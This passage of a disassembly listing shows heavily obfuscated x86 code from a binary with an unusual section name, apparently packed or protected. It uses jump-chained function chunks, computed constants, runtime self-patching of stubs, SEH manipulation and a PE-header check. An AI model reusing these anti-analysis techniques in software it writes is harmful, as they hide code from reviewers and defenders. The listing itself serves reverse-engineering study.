		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		jmp	loc_441E55
sub_44809F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4480B3	proc near		; CODE XREF: hvvrg7ie:0043B4E6j
					; hvvrg7ie:004597C9p

; FUNCTION CHUNK AT 0043AD57 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00451521 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456BA6 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edi
		push	0DB9835F7h
		pop	edi
		sub	edi, 6C5841B6h
		jmp	loc_43AD57
sub_4480B3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_4480C9:				; CODE XREF: sub_446EC2-90C6j
		jnz	loc_44F910
		sbb	edx, 4D23BC3h
		jmp	loc_440D27
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------

loc_4480DA:				; CODE XREF: hvvrg7ie:00440D71j
		mov	edx, [eax]

; =============== S U B	R O U T	I N E =======================================



sub_4480DC	proc near		; CODE XREF: hvvrg7ie:0044B3B4p
		xchg	eax, [esp+0]
		pop	eax
		call	nullsub_382
		jmp	loc_43C4CB
sub_4480DC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4480EA:				; CODE XREF: sub_451669:loc_4574CCj
		mov	edx, eax
		pop	eax

loc_4480ED:				; CODE XREF: hvvrg7ie:loc_44AF30j
		mov	eax, [esp+0]
		push	edx
		call	sub_45329F
		push	4DB61BBCh
		jmp	loc_44E6D8
; END OF FUNCTION CHUNK	FOR sub_451669

; =============== S U B	R O U T	I N E =======================================



sub_448100	proc near		; CODE XREF: sub_45488E:loc_447051p
					; hvvrg7ie:00452BCAj

; FUNCTION CHUNK AT 00439279 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00439A01 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043BB20 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043CCB0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043D401 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D7D9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043DCD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440AF4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442853 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443043 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004436F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445C00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004464BC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447897 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AB5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449180 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004496CE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CFD0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044E838 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044FD10 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004502F3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452362 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452936 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452A3F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004552FF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004554F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045701F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457CFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ABCA SIZE 00000010 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0D220BA6Fh
		pop	eax
		xor	eax, 0AA61137Dh
		jns	loc_43D7DF
		mov	ebp, edx
		jmp	loc_45701F
sub_448100	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE9B

loc_44811D:				; CODE XREF: sub_43FE9Bj
		call	sub_45B048
		push	eax
		mov	eax, ebx
		xchg	eax, [esp+4+var_4]
		push	ecx
		pop	ebx
		jmp	loc_439CB4
; END OF FUNCTION CHUNK	FOR sub_43FE9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4441ED

loc_44812F:				; CODE XREF: sub_4441ED:loc_445919j
		push	edx
		push	67D087Dh
		pop	edx
		rol	edx, 9
		add	edx, 6334428h
		xchg	edx, [esp+8+var_8]
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_4441ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D4

loc_448147:				; CODE XREF: sub_4541D4-12B34j
		xchg	edi, [esp+0]
		push	0
		lea	eax, [ebp-4]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		call	sub_439AE3
		jmp	loc_45A24B
; END OF FUNCTION CHUNK	FOR sub_4541D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_44815F:				; CODE XREF: sub_4500FA:loc_4483E9j
		jz	loc_45AC5E
		push	edi
		xor	edx, ebx
		sbb	edi, 8E4FE1Dh
		jmp	loc_450849
; END OF FUNCTION CHUNK	FOR sub_4500FA

; =============== S U B	R O U T	I N E =======================================



sub_448173	proc near		; CODE XREF: sub_4500FA:loc_44448Fp
					; hvvrg7ie:0044CD22j

; FUNCTION CHUNK AT 004442CF SIZE 00000007 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [eax]
		mov	[ebp-4], eax
		jmp	loc_4442CF
sub_448173	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448181	proc near		; DATA XREF: hvvrg7ie:0045A482o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A009 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D634 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FCDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045215B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00453BE7 SIZE 00000005 BYTES

		pop	edx
		jo	loc_43D634
		mov	eax, [esp-4+arg_0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		push	eax
		push	0A840569Ah
		jmp	loc_44FCDF
sub_448181	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44819C:				; CODE XREF: hvvrg7ie:loc_43C878j
		jz	loc_441306
		jmp	loc_43F26D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_4481A7:				; CODE XREF: hvvrg7ie:loc_43DA7Fj
					; hvvrg7ie:0043E672j ...
		xor	ecx, 0F53FC123h
		popf
		xor	eax, ecx
		pop	ecx
		jmp	loc_446735
; END OF FUNCTION CHUNK	FOR sub_440AD9

; =============== S U B	R O U T	I N E =======================================



sub_4481B6	proc near		; DATA XREF: sub_4512A0-151EBo

; FUNCTION CHUNK AT 0043F2F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446988 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448961 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A6A SIZE 00000012 BYTES

		pop	edi
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44698D
		jmp	loc_43F2F2
sub_4481B6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_4481C7:				; CODE XREF: sub_439990:loc_4420D3j
		pop	ecx
		sub	ecx, 0D8D5033Dh
		xor	ecx, 0E8BB8D82h
		and	ecx, 0CC9553D1h
		or	ecx, 3CFEF2A7h
		add	ecx, 8344A016h
		xchg	ecx, [esp+0]
		jmp	sub_4403D4
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_4481EE:				; CODE XREF: sub_45B048-7606j
		and	edx, eax
		ror	ebp, 0Eh

loc_4481F3:				; CODE XREF: sub_45B048:loc_45461Dj
		pop	large dword ptr	fs:0
		add	esp, 4
		push	92820695h
		push	offset sub_4450D8
		jmp	nullsub_506
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_44820C:				; CODE XREF: hvvrg7ie:loc_44B6ABj
		jnz	loc_45185B
		pop	edi
		test	ebx, edi
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_448215:				; CODE XREF: sub_43E163:loc_447CD9j
		jmp	loc_451855
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44821A:				; CODE XREF: sub_43E128+19BC8j
		jge	loc_43B005

loc_448220:				; CODE XREF: hvvrg7ie:00449AB1j
		jmp	loc_459700
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_448225:				; CODE XREF: sub_43F98C+6ED1j
		jmp	loc_442D7F
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F6D

loc_44822A:				; CODE XREF: sub_446F6D-A000j
		jmp	loc_44C1AA
; END OF FUNCTION CHUNK	FOR sub_446F6D
; ---------------------------------------------------------------------------
		cmp	edx, 1ABC42AAh
		jmp	loc_43AFF9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_531. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44823B:				; CODE XREF: hvvrg7ie:00454FE6j
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_18
		mov	byte ptr [eax],	0C3h
		jmp	loc_456BE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2D2

loc_44824C:				; CODE XREF: sub_44E2D2j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_456C8B
; END OF FUNCTION CHUNK	FOR sub_44E2D2
; ---------------------------------------------------------------------------
		ror	esi, 9
		jmp	sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D8

loc_44825E:				; CODE XREF: sub_4450D8:loc_43A16Bj
		push	ecx
		pushf
		push	0FF1E36E9h
		pop	ecx
		xor	ecx, 0E64B5E75h
		add	ecx, 0E6EF99D0h
		popf
		jmp	loc_43DD6A
; END OF FUNCTION CHUNK	FOR sub_4450D8
; ---------------------------------------------------------------------------

loc_448278:				; CODE XREF: hvvrg7ie:0044EB95j
		mov	[edx], edi
		sbb	esi, edx
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_44827C:				; CODE XREF: sub_44B7CB:loc_44EB7Ej
		add	eax, 1C6BD0C5h
		call	sub_450C5A
		mov	ds:dword_41D168, eax
		lea	eax, nullsub_17
		mov	byte ptr [eax],	0C3h
		jmp	loc_43AFB1
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_448. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_44829C:				; CODE XREF: sub_4417B1+6CB5j
		jmp	loc_43CF8D
; END OF FUNCTION CHUNK	FOR sub_4417B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD7

loc_4482A1:				; CODE XREF: sub_44AFD7:loc_44DF2Aj
		shl	ebp, 0Fh
		rol	ebp, 0Bh
		jmp	near ptr dword_43C2F4+0Fh
; END OF FUNCTION CHUNK	FOR sub_44AFD7
; ---------------------------------------------------------------------------

loc_4482AC:				; CODE XREF: hvvrg7ie:0043AB01j
		sub	ebx, edi

loc_4482AE:				; CODE XREF: hvvrg7ie:loc_45714Dj
		or	edx, ds:4000F0h
		jns	loc_43E687
		ror	edi, 1Eh
		jmp	loc_45983E
; ---------------------------------------------------------------------------

loc_4482C2:				; CODE XREF: hvvrg7ie:loc_4527DCj
		pop	eax
		or	ecx, 0FE585EE6h
		call	sub_44B147
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_4482CE:				; CODE XREF: sub_444BE1+142EAj
		jmp	loc_443B15
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D0E

loc_4482D3:				; CODE XREF: sub_444D0E+Dj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_444D0E
; ---------------------------------------------------------------------------

loc_4482D8:				; CODE XREF: hvvrg7ie:00451D1Dj
		popf
		xchg	esi, ebp

loc_4482DB:				; CODE XREF: hvvrg7ie:loc_449982j
		xor	eax, eax
		mov	[ebp-8], eax
		jmp	loc_44C4F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_4482E5:				; CODE XREF: sub_43A0EC:loc_4403CFj
		call	sub_45A234

loc_4482EA:				; DATA XREF: sub_444B29+4F4Fo
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		cmp	dword ptr [eax], 4550h
		jnz	loc_447CE9
		jmp	loc_457183
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44830C:				; CODE XREF: hvvrg7ie:0043A516j
		jmp	loc_459E3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446581

loc_448311:				; CODE XREF: sub_446581:loc_44B9D1j
		call	sub_445616
		mov	ds:dword_45A8B0, eax
; END OF FUNCTION CHUNK	FOR sub_446581
; START	OF FUNCTION CHUNK FOR sub_43AFB6

loc_44831B:				; CODE XREF: sub_43AFB6+4j
					; sub_446581+Bj ...
		mov	eax, ds:dword_45A8B0
		call	sub_43E7F3

loc_448325:				; CODE XREF: sub_43C485:loc_45B27Dj
		jmp	loc_439A4B
; END OF FUNCTION CHUNK	FOR sub_43AFB6
; ---------------------------------------------------------------------------
		sub	esi, eax
		jmp	sub_43F0A1
; ---------------------------------------------------------------------------

loc_448331:				; CODE XREF: hvvrg7ie:004511BFj
		mov	ecx, edi
		pop	edi
		pop	edx
		xchg	ecx, [esp]
		mov	eax, ecx
		pop	ecx
		pop	ebp
		jmp	loc_45AF60
; ---------------------------------------------------------------------------

loc_448341:				; DATA XREF: sub_455087:loc_43B68Fo
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43FB4F
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_44834D:				; CODE XREF: sub_4589D3:loc_4473F3j
		jmp	loc_4448A2
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_448352:				; CODE XREF: sub_442F6B:loc_43C342j
		add	edx, 3B41C6Ah
		xor	edx, 13DD57D9h
		xor	eax, edx
		pop	edx
		push	offset sub_444CE5
		jmp	loc_451135
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398FA

loc_44836B:				; CODE XREF: sub_4398FA:loc_456E5Fj
		jge	loc_44E8C6
		add	ecx, esi
		not	edi
		push	878043F1h
		adc	esi, 0CE011DCDh
		jmp	loc_44E8C6
; END OF FUNCTION CHUNK	FOR sub_4398FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_448385:				; CODE XREF: sub_445B46+6j
		xchg	ebx, [esp+4+var_4]
		mov	edx, ebx
		adc	ebx, 0FA6CF3E5h
		jmp	loc_447DB1
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_448395:				; CODE XREF: sub_43AB99+1E0DDj
		or	eax, 4DB0DD43h
		js	loc_45A358

loc_4483A1:				; CODE XREF: hvvrg7ie:0044015Cj
		jmp	loc_44B7F0
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		add	ebx, 90AA5FC2h
		mov	ecx, [esi]
		jmp	loc_45A34A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_4483B3:				; CODE XREF: sub_43AE41+19FA9j
		jnb	loc_45144D

loc_4483B9:				; CODE XREF: sub_43AE41:loc_444588j
		push	esi
		push	1302AB6Ah
		pop	esi
		rol	esi, 0Fh
		sub	esi, 0E094304Ah
		test	esi, 40000000h
		jmp	loc_44D441
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------

loc_4483D4:				; CODE XREF: hvvrg7ie:00441427j
		sub	ecx, 50124A13h

; =============== S U B	R O U T	I N E =======================================



sub_4483DA	proc near		; CODE XREF: sub_457F6F-B90Fp
		xchg	eax, [esp+0]
		pop	eax
		mov	edx, 0A70158B4h
		push	edx
		call	sub_4401DB
sub_4483DA	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_4483E9:				; CODE XREF: sub_4500FA-17CCj
		jmp	loc_44815F
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FC12

loc_4483EE:				; CODE XREF: sub_44FC12-8347j
		jmp	nullsub_417
; END OF FUNCTION CHUNK	FOR sub_44FC12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44457D

loc_4483F3:				; CODE XREF: sub_44457D+1108Cj
		shr	ecx, 1Ch
		xchg	edi, [esp+0]
		mov	ebx, edi
		pop	edi
		jmp	loc_43EB86
; END OF FUNCTION CHUNK	FOR sub_44457D
; ---------------------------------------------------------------------------
		cmp	edi, esi
		jmp	loc_43E7BE
; ---------------------------------------------------------------------------

loc_448408:				; CODE XREF: hvvrg7ie:0043CC18j
		add	eax, ebp
		add	eax, 68D7FFDEh
		mov	eax, [eax]
		push	eax
		call	sub_45202B
		call	sub_44ABE8
; START	OF FUNCTION CHUNK FOR sub_441230

loc_44841D:				; CODE XREF: sub_441230+Dj
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_441230
; ---------------------------------------------------------------------------

locret_448422:				; CODE XREF: hvvrg7ie:loc_44BF84j
		retn
; ---------------------------------------------------------------------------

loc_448423:				; CODE XREF: hvvrg7ie:0045A486j
		jmp	locret_44ECA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_448428:				; CODE XREF: sub_450F97:loc_456B70j
		add	eax, 6658BD3Bh
		mov	dword ptr [eax], 646E6957h
		lea	eax, [ebp+var_18]
		mov	dword ptr [eax], 6C43776Fh
; END OF FUNCTION CHUNK	FOR sub_450F97
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44843D:				; CODE XREF: sub_450434+F09j
		lea	eax, [ebp-14h]
		mov	dword ptr [eax], 737361h
		push	0
		jmp	loc_446E33
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_44844D:				; CODE XREF: hvvrg7ie:loc_44E10Aj
		xor	ebp, ecx
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_44844F:				; CODE XREF: sub_4518BD:loc_44E0F4j
		xor	eax, 7771FFAAh
		test	eax, 200000h
		jmp	loc_45B4DD
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_448460:				; CODE XREF: sub_4417B1:loc_4417BCj
		jz	loc_45495F
		jmp	loc_44829C
; END OF FUNCTION CHUNK	FOR sub_4417B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_326. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44846C:				; CODE XREF: hvvrg7ie:0044A3FFj
					; hvvrg7ie:loc_450709j
		mov	eax, 10h
		push	edi
		push	0F8AB120Ch
		pop	edi
		or	edi, 8D9F4C84h
		add	edi, 2852600h
		xchg	edi, [esp]
		jmp	sub_44BF66
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_459C3A
; ---------------------------------------------------------------------------

loc_448492:				; CODE XREF: hvvrg7ie:0044D8A0j
		jz	loc_443211
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_448498:				; CODE XREF: sub_43C0DE+2CC2j
		or	ebx, 0C69A4579h
		add	ebx, 39A943E3h
		xchg	ebx, [esp+0]
		jmp	loc_43F526
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_4484AC:				; CODE XREF: hvvrg7ie:loc_4472F1j
		test	esi, eax
		jmp	loc_446E08
; ---------------------------------------------------------------------------

loc_4484B3:				; CODE XREF: hvvrg7ie:00451108j
		popf
		jmp	loc_43F461

; =============== S U B	R O U T	I N E =======================================



sub_4484B9	proc near		; CODE XREF: hvvrg7ie:0044FB97j
					; sub_43AE41:loc_451262p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044932A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C87C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004518AE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004567E3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	esi, 7520D937h
		xchg	esi, [esp-4+arg_0]
		push	0
		push	edi
		jmp	loc_44C87C
sub_4484B9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4484CE:				; CODE XREF: hvvrg7ie:00442C21j
		add	ecx, 0F283E1CBh
		cmp	ebx, ebp
		jmp	loc_447949
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4484DC:				; CODE XREF: sub_44059F-4214j
		jmp	nullsub_290
; END OF FUNCTION CHUNK	FOR sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_4484E1	proc near		; DATA XREF: hvvrg7ie:0045915Ao

; FUNCTION CHUNK AT 0043BE77 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043C073 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E52C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004416B0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441EFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446181 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DD11 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452705 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453290 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045479C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454DA6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00456D36 SIZE 0000000B BYTES

		push	0B4101169h
		pop	ecx
		or	ecx, 0C40332B5h
		and	ecx, 0CEDA17Ah
		sub	ecx, 8F23D409h
		add	ecx, 7AEEC30Ch

loc_4484FF:				; CODE XREF: hvvrg7ie:loc_4485E7j
		jmp	loc_454DA6
sub_4484E1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448504:				; CODE XREF: hvvrg7ie:00454E24j
		jz	loc_452CCC
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_44850A:				; CODE XREF: sub_4447AC+10j
		jmp	loc_4503BC
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
		adc	ebp, edx
		and	edx, ebx
		mov	[ecx], ebx
		jle	loc_447FA6
		jmp	loc_452CC6
; ---------------------------------------------------------------------------

loc_448520:				; CODE XREF: hvvrg7ie:00450E39j
		jnz	loc_44487C
		jmp	loc_44DCCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9B0

loc_44852B:				; CODE XREF: sub_44C9B0:loc_44D518j
		mov	[ebp-0Ch], eax
		shl	dword ptr [ebp-8], 8
		jmp	loc_450820
; ---------------------------------------------------------------------------

loc_448537:				; CODE XREF: sub_44C9B0:loc_44C9BAj
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_44DDFF
		mov	eax, [ebp-4]
		call	sub_43AD3E
; END OF FUNCTION CHUNK	FOR sub_44C9B0
; START	OF FUNCTION CHUNK FOR sub_43BFE7

loc_44854B:				; CODE XREF: sub_43BFE7+7C1Aj
		jmp	loc_45003B
; END OF FUNCTION CHUNK	FOR sub_43BFE7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_450. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_448551:				; CODE XREF: sub_44D2F8-5D8Ej
		jmp	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_448556:				; CODE XREF: sub_44ABA3:loc_43DE97j
					; sub_4426E2+3F9Bj
		pop	edi
		sub	edi, 7F80ABDEh
		pushf

loc_44855E:				; CODE XREF: sub_4426E2:loc_4448ADj
		push	edi
		push	3C851362h
		sub	edi, 7147E62Bh
		jmp	loc_440D4E
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_44856F:				; CODE XREF: sub_441FE4:loc_457304j
		xor	ebx, 0B68CCEE6h
		sub	eax, ebx
		pop	ebx
		push	ecx
		pushf
		push	6E03B69Bh
		jmp	loc_43F803
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		mov	eax, 0D504D785h
		call	sub_450C5A
		mov	ds:off_41D07C, eax
		lea	eax, sub_447DE4
		mov	byte ptr [eax],	0C3h
		jmp	sub_447DE4

; =============== S U B	R O U T	I N E =======================================



sub_4485A2	proc near		; CODE XREF: sub_41C28D+1B7p
					; hvvrg7ie:0045105Cj
					; DATA XREF: ...

; FUNCTION CHUNK AT 00439522 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444146 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004459A5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DCC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C26 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004549A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553FA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457649 SIZE 00000003 BYTES

		call	sub_45970D

loc_4485A7:				; CODE XREF: sub_451C8E:loc_456AF4j
		add	esp, 0FFFFFFF8h
		mov	[ebp-1], al
		cmp	byte ptr [ebp-1], 0
		jz	loc_443060
		jmp	loc_444146
sub_4485A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_4485BC:				; CODE XREF: sub_45202B-D1A2j
		jnb	loc_45435F

loc_4485C2:				; CODE XREF: sub_45202B:loc_43B8C3j
		call	sub_44DE0A
		push	offset loc_4476A6
		jmp	loc_43A1CF
; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------
		pop	edx
		pop	eax
		push	eax
		push	0A92340F6h
		xchg	edi, [esp]
		jmp	loc_449A43
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_441. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4485E2:				; CODE XREF: hvvrg7ie:00446E78j
		jmp	loc_45589D
; ---------------------------------------------------------------------------

loc_4485E7:				; CODE XREF: hvvrg7ie:00459C25j
		jb	loc_4484FF
		xor	edi, 6E1F6C1Ch

loc_4485F3:				; CODE XREF: hvvrg7ie:loc_459C13j
		push	offset sub_451482
		jmp	loc_43B470
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_4485FD:				; CODE XREF: sub_443375+11F6Dj
		xchg	ebp, [esp+8+var_8]

loc_448600:				; CODE XREF: hvvrg7ie:loc_449BABj
		jmp	loc_450346
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_448605:				; CODE XREF: sub_43E128:loc_44D054j
		cmp	dword ptr [ebp-10Ch], 6D676552h
		jnz	loc_44DCB3
		jmp	loc_44C66A
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_44861A:				; CODE XREF: hvvrg7ie:0044B8BEj
		jnb	loc_44DF1E

; =============== S U B	R O U T	I N E =======================================



sub_448620	proc near		; CODE XREF: sub_43AB99+1E78Cp

; FUNCTION CHUNK AT 0044A3C7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450FED SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	134E49E3h
		pop	ecx
		and	ecx, 0ADB6EAD3h
		sub	ecx, 8BCF9FA8h
		add	ecx, 0A7853DC0h
		jmp	loc_450FED
sub_448620	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448641:				; CODE XREF: hvvrg7ie:loc_44749Aj
		xor	eax, 0FB07561Bh
		or	eax, 81D1B480h
